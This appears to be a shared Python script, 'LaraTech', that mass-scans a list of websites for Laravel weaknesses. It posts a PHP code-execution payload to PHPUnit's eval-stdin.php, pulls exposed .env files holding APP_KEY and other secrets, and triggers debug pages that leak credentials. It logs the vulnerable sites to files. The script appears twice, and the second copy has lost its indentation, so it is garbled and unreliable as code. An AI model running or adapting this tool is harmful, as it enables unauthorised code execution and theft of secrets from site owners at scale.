galehrizky · July 24, 2020 00:44
diff --git a/laratech.py b/laratech.py
 # ======================================================
 # Change the author name don't make you become a coder 
 # contact : [email protected]  
 # Priv8 tools            
 # requirement : python3                                
 # use : python3 laravel.py                          
 # @2020 galehdotid | fb.com/hax0rtersakiti             
 # =======================================================


 import requests,time,os,sys,re
 from termcolor import colored
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 from concurrent.futures import ThreadPoolExecutor

 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

 class warna():
 	"""docstring for warna"""
 	def red(self,str):
 		return colored(str, "red")
 	def blue(self,str):
 		return colored(str, "blue")
 	def green(self,str):
 		return colored(str, "green")
 	def yellow(self,str):
 		return colored(str, "yellow")



 class _exploit():
 	"""This Class For check the  initial"""
 	def __init__(self):
 		self.clr = warna()

 	def phpunit_detect(self,url):

 		try:
 			self.detectenv(url)
 			with requests.Session() as session:

 				session.headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"}
 				payload = "<?php echo 'galehdotids#'.php_uname().'#'; ?>"
 				response = session.post(url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', data=payload,verify=False,timeout=5,allow_redirects=False)

 				if 'galehdotids' in response.text:
 					print(self.clr.green("[-] [PHPUNIT] [VULN] {}".format(url)))
 					self.save(url, "phpunit.txt")
 				else:
 					self.save(url, "not_vuln.txt")	
 					print(self.clr.red("[-] [PHP UNIT NOT VULN] {}".format(url)))

 		except Exception as e:
 			pass 


 	def detectenv(self,url):
 		try:
 			with requests.Session() as session:
 				session.headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"}
 				wew = session.get(url+'/.env',verify=False,timeout=5,allow_redirects=False)
 				waw = session.get(url+'/vendor/.env',verify=False,timeout=5,allow_redirects=False)
 				wuw = session.get(url+'/storage/.env',verify=False,timeout=5,allow_redirects=False)
 				wwek = session.get(url+'/public/.env',verify=False,timeout=5,allow_redirects=False)
 				if 'APP_KEY=' in wew.text:
 					url_env = url+'/.env'
 					print(self.clr.green("[-] [ENV] [/env] {}".format(url)))
 				elif 'APP_KEY=' in waw.text:
 					url_env = url+'/vendor/.env'
 					print(self.clr.green("[-] [ENV] [/vendor/.env] {}".format(url)))
 				elif 'APP_KEY=' in wuw.text:
 					url_env = url+'/storage/.env'
 					print(self.clr.green("[-] [ENV] [/storage/.env] {}".format(url)))
 				elif 'APP_KEY=' in wwek.text:
 					url_env = url+'/storage/.env'
 					print(self.clr.green("[-] [ENV] [/public/.env] {}".format(url)))
 				else:
 					self.getdebug(url)
 					print(self.clr.red("[-] [ENV] [NOT VALID] {}".format(url)))

 			self.save(url_env, "env_laravel.txt")	
 		except Exception as e:
 			pass

 	def getdebug(self,url):

 		try:
 			with requests.Session() as session:
 				session.headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"}
 				wew = session.post(url,data={"0x[1]":"awkoakweokawokM0ment"},verify=False,timeout=10,allow_redirects=False)
 				if '<td>APP_KEY</td>' in wew.text:
 					print(self.clr.green("[-] [LARAVEL DEBUG] [OK] {}".format(url)))
 					self.save(url, "debug_laravel.txt")	
 				else:
 					self.save(url, "not_vuln.txt")
 		except Exception as e:
 			pass


 	def save(self, sites, names):
 		s = open(names, "a+")
 		s.write(sites+"\n")

 		return s

 exploit = _exploit()

 def main():

 	try:
 		print(''' ┏━┓━┏┓━━━━━━━━━━━━━━━━━━━━┏━━┓━━━━━━┏┓━
 ┃┃┗┓┃┃━━━━━━━━━━━━━━━━━━━━┃┏┓┃━━━━━┏┛┗┓
 ┃┏┓┗┛┃┏━━┓┏┓┏━━┓┏┓┏━┓━┏━━┓┃┗┛┗┓┏━━┓┗┓┏┛
 ┃┃┗┓┃┃┃┏┓┃┣┫┃━━┫┣┫┃┏┓┓┃┏┓┃┃┏━┓┃┃┏┓┃━┃┃━
 ┃┃━┃┃┃┃┗┛┃┃┃┣━━┃┃┃┃┃┃┃┃┗┛┃┃┗━┛┃┃┗┛┃━┃┗┓
 ┗┛━┗━┛┗━┓┃┗┛┗━━┛┗┛┗┛┗┛┗━┓┃┗━━━┛┗━━┛━┗━┛
 ━━━━━━┏━┛┃━━━━━━━━━━━━┏━┛┃━━━━━━━━━━━━━
 ━━━━━━┗━━┛━━━━━━━━━━━━┗━━┛━━━━━━━━━━━━━
 Galerzz x LaraTech v.1 Bajingan Berotak
        Still crack your brain !
 ''')

 		lisnya = input("Your name list -> ")
 		trit = int(input("Put Your Thread Number -> "))

 		os.system('cls' if os.name == 'nt' else 'clear')


 		try:
 			with ThreadPoolExecutor(max_workers=trit) as executor:
 				with open(lisnya, 'r') as url:
 					for x in url:
 						aw = x
 						if not re.match('(?:http|ftp|https)://', x):
 							aw = 'http://{}'.format(x)

 						executor.submit(exploit.phpunit_detect,aw.rstrip())
 		except IOError  as e:
 			print("[-] YOUR LIST NOT FOUND !")
 			sys.exit()
 			pass
 		
 	except Exception as e:
 		pass


 if __name__ == '__main__':
 	try:
 		main()
 	except KeyboardInterrupt  as e:
 		print("[!] Exit Program....")
 		sys.exit()
 		pass
	# ======================================================
	# Change the author name don't make you become a coder
	# contact : [email protected]
	# Priv8 tools
	# requirement : python3
	# use : python3 laravel.py
	# @2020 galehdotid \| fb.com/hax0rtersakiti
	# =======================================================


	import requests,time,os,sys,re
	from termcolor import colored
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	from concurrent.futures import ThreadPoolExecutor

	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

	class warna():
	"""docstring for warna"""
	def red(self,str):
	return colored(str, "red")
	def blue(self,str):
	return colored(str, "blue")
	def green(self,str):
	return colored(str, "green")
	def yellow(self,str):
	return colored(str, "yellow")



	class _exploit():
	"""This Class For check the initial"""
	def __init__(self):
	self.clr = warna()

	def phpunit_detect(self,url):

	try:
	self.detectenv(url)
	with requests.Session() as session:

	session.headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"}
	payload = "<?php echo 'galehdotids#'.php_uname().'#'; ?>"
	response = session.post(url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', data=payload,verify=False,timeout=5,allow_redirects=False)

	if 'galehdotids' in response.text:
	print(self.clr.green("[-] [PHPUNIT] [VULN] {}".format(url)))
	self.save(url, "phpunit.txt")
	else:
	self.save(url, "not_vuln.txt")
	print(self.clr.red("[-] [PHP UNIT NOT VULN] {}".format(url)))

	except Exception as e:
	pass


	def detectenv(self,url):
	try:
	with requests.Session() as session:
	session.headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"}
	wew = session.get(url+'/.env',verify=False,timeout=5,allow_redirects=False)
	waw = session.get(url+'/vendor/.env',verify=False,timeout=5,allow_redirects=False)
	wuw = session.get(url+'/storage/.env',verify=False,timeout=5,allow_redirects=False)
	wwek = session.get(url+'/public/.env',verify=False,timeout=5,allow_redirects=False)
	if 'APP_KEY=' in wew.text:
	url_env = url+'/.env'
	print(self.clr.green("[-] [ENV] [/env] {}".format(url)))
	elif 'APP_KEY=' in waw.text:
	url_env = url+'/vendor/.env'
	print(self.clr.green("[-] [ENV] [/vendor/.env] {}".format(url)))
	elif 'APP_KEY=' in wuw.text:
	url_env = url+'/storage/.env'
	print(self.clr.green("[-] [ENV] [/storage/.env] {}".format(url)))
	elif 'APP_KEY=' in wwek.text:
	url_env = url+'/storage/.env'
	print(self.clr.green("[-] [ENV] [/public/.env] {}".format(url)))
	else:
	self.getdebug(url)
	print(self.clr.red("[-] [ENV] [NOT VALID] {}".format(url)))

	self.save(url_env, "env_laravel.txt")
	except Exception as e:
	pass

	def getdebug(self,url):

	try:
	with requests.Session() as session:
	session.headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"}
	wew = session.post(url,data={"0x[1]":"awkoakweokawokM0ment"},verify=False,timeout=10,allow_redirects=False)
	if '<td>APP_KEY</td>' in wew.text:
	print(self.clr.green("[-] [LARAVEL DEBUG] [OK] {}".format(url)))
	self.save(url, "debug_laravel.txt")
	else:
	self.save(url, "not_vuln.txt")
	except Exception as e:
	pass


	def save(self, sites, names):
	s = open(names, "a+")
	s.write(sites+"\n")

	return s

	exploit = _exploit()

	def main():

	try:
	print(''' ┏━┓━┏┓━━━━━━━━━━━━━━━━━━━━┏━━┓━━━━━━┏┓━
	┃┃┗┓┃┃━━━━━━━━━━━━━━━━━━━━┃┏┓┃━━━━━┏┛┗┓
	┃┏┓┗┛┃┏━━┓┏┓┏━━┓┏┓┏━┓━┏━━┓┃┗┛┗┓┏━━┓┗┓┏┛
	┃┃┗┓┃┃┃┏┓┃┣┫┃━━┫┣┫┃┏┓┓┃┏┓┃┃┏━┓┃┃┏┓┃━┃┃━
	┃┃━┃┃┃┃┗┛┃┃┃┣━━┃┃┃┃┃┃┃┃┗┛┃┃┗━┛┃┃┗┛┃━┃┗┓
	┗┛━┗━┛┗━┓┃┗┛┗━━┛┗┛┗┛┗┛┗━┓┃┗━━━┛┗━━┛━┗━┛
	━━━━━━┏━┛┃━━━━━━━━━━━━┏━┛┃━━━━━━━━━━━━━
	━━━━━━┗━━┛━━━━━━━━━━━━┗━━┛━━━━━━━━━━━━━
	Galerzz x LaraTech v.1 Bajingan Berotak
	Still crack your brain !
	''')

	lisnya = input("Your name list -> ")
	trit = int(input("Put Your Thread Number -> "))

	os.system('cls' if os.name == 'nt' else 'clear')


	try:
	with ThreadPoolExecutor(max_workers=trit) as executor:
	with open(lisnya, 'r') as url:
	for x in url:
	aw = x
	if not re.match('(?:http\|ftp\|https)://', x):
	aw = 'http://{}'.format(x)

	executor.submit(exploit.phpunit_detect,aw.rstrip())
	except IOError as e:
	print("[-] YOUR LIST NOT FOUND !")
	sys.exit()
	pass

	except Exception as e:
	pass


	if __name__ == '__main__':
	try:
	main()
	except KeyboardInterrupt as e:
	print("[!] Exit Program....")
	sys.exit()
	pass